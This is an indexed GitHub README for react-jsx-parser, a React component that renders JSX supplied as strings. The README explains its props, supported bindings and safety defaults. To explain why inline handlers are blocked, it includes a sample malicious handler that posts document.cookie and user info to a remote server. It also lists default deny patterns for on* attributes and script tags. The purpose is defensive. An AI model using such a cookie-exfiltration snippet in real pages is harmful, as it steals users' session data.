Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/vercel/react-jsx-parser
A React component which can parse JSX and output rendered React Components.
https://github.com/vercel/react-jsx-parser
Last synced: 3 months ago
JSON representation
A React component which can parse JSX and output rendered React Components.
- Host: GitHub
- URL: https://github.com/vercel/react-jsx-parser
- Owner: vercel
- License: mit
- Fork: true (TroyAlford/react-jsx-parser)
- Created: 2019-05-09T03:00:25.000Z (over 5 years ago)
- Default Branch: develop
- Last Pushed: 2019-05-21T21:27:38.000Z (over 5 years ago)
- Last Synced: 2024-09-18T03:38:11.927Z (4 months ago)
- Language: JavaScript
- Size: 923 KB
- Stars: 12
- Watchers: 16
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# react-jsx-parser [![CircleCI][circle-ci-badge]](https://circleci.com/gh/TroyAlford/react-jsx-parser) [![Version][npm-version]][npm-link] [![NPM Downloads][npm-downloads]][npm-link] [![License][npm-license]](https://github.com/TroyAlford/react-jsx-parser/blob/master/LICENSE)
[circle-ci-badge]: https://img.shields.io/circleci/project/github/TroyAlford/react-jsx-parser/master.svg
[npm-version]: https://img.shields.io/npm/v/react-jsx-parser.svg
[npm-downloads]: https://img.shields.io/npm/dt/react-jsx-parser.svg
[npm-license]: https://img.shields.io/npm/l/react-jsx-parser.svg
[npm-link]: https://www.npmjs.com/package/react-jsx-parserA React component which can parse JSX and output rendered React Components.
## Basic Usage - Injecting JSX as a String
```javascript
import React from 'react'
import JsxParser from 'react-jsx-parser'
import Library from 'some-library-of-components'class InjectableComponent extends Component {
static defaultProps = {
eventHandler: () => {}
}
// ... inner workings of InjectableComponent
}const MyComponent = () => (
{ /* ... do stuff ... */ },
}}
components={{ InjectableComponent, Library }}
jsx={`
Header
`}
/>
)
```Because `InjectableComponent` is passed into the `JsxParser.props.components` prop, it is treated as a known element
type, and created using `React.createElement(...)` when parsed out of the JSX. You can also pass in a whole collection
of components, as shown by the `Library` binding, and then access the individual items with `LibraryName.ComponentName`.Finally, a note about property bindings. The `JsxParser` can handle several types of binding:
- implicit `true` bindings, such as `` (equivalent to `truthyProp={true}`)
- string-value binding, such as `stringProp="foo"`
- expression-binding, such as `calc={1 + 1}`
- named-value binding, such as `eventHandler={myEventHandler}` (note that this requires a match in `bindings`)The component **_does not_** support inline function declarations, such as:
- `onClick={function (event) { /* do stuff */ }}`, or
- `onKeyPress={event => { /* do stuff */}}`This is to prevent inadvertent XSS attack vectors. Since the primary use of this component is to allow JSX to be stored server-side, and then late-interpreted at the client-side, this restriction prevents a malicious user from stealing info by executing a situation like:
```javascript
{
fetch('/some/remote/server', {
body: JSON.stringify({ cookies: document.cookie, userInfo })
})
}}
/>
```## Advanced Usage - Injecting Dynamic JSX
```javascript
// Import desired set of components
import { ComponentA, ComponentB } from 'somePackage/Components'
import ComponentC from 'somePackage/ComponentC'
import ComponentD from 'somePackage/ComponentD'
...
// Load an HTML or XML fragment from a remote API
const dynamicHtml = loadRemoteData()
...
// Within your component's render method, bind these components and the fragment as props```
Any `ComponentA`, `ComponentB`, `ComponentC` or `ComponentD` tags in the dynamically loaded XML/HTML fragment will be rendered as React components. Any unrecognized tags will be handled by `React`.
_Note:_ Non-standard tags may throw errors and warnings, but will typically be rendered in a reasonable way.
## PropTypes / Settings
```javascript
JsxParser.defaultProps = {
// if false, unrecognized elements like are omitted and reported via onError
allowUnknownElements: true, // by default, allow unrecognized elementsbindings: {}, // by default, do not add any additional bindings
// by default, just removes `on*` attributes (onClick, onChange, etc.)
// values are used as a regex to match property names
blacklistedAttrs: [/^on.+/i],// by default, removes all tags
blacklistedTags: ['script'],// an object map of component tag-names to their definitions - see above for examples
// components must extend React.Component, React.PureComponent, or be a Function
components: {},componentsOnly: false, // non-component HTML tags are allowed by default, omitted if true
disableFragments: false, // if enabled, React <Fragment />s will not be used.
// Note: This introduces subtle errors with regard to white-space, and is provided only for
// backward compatibility with React 15.xjsx: '', // the jsx string to be parsed & rendered
onError: () => {}, // if specified, any rendering errors are reported via this method
showWarnings: false, // if true showWarnings, rendering errors are output with console.warn
renderInWrapper: true, // if false, the HTML output will have no <div> wrapper
}
```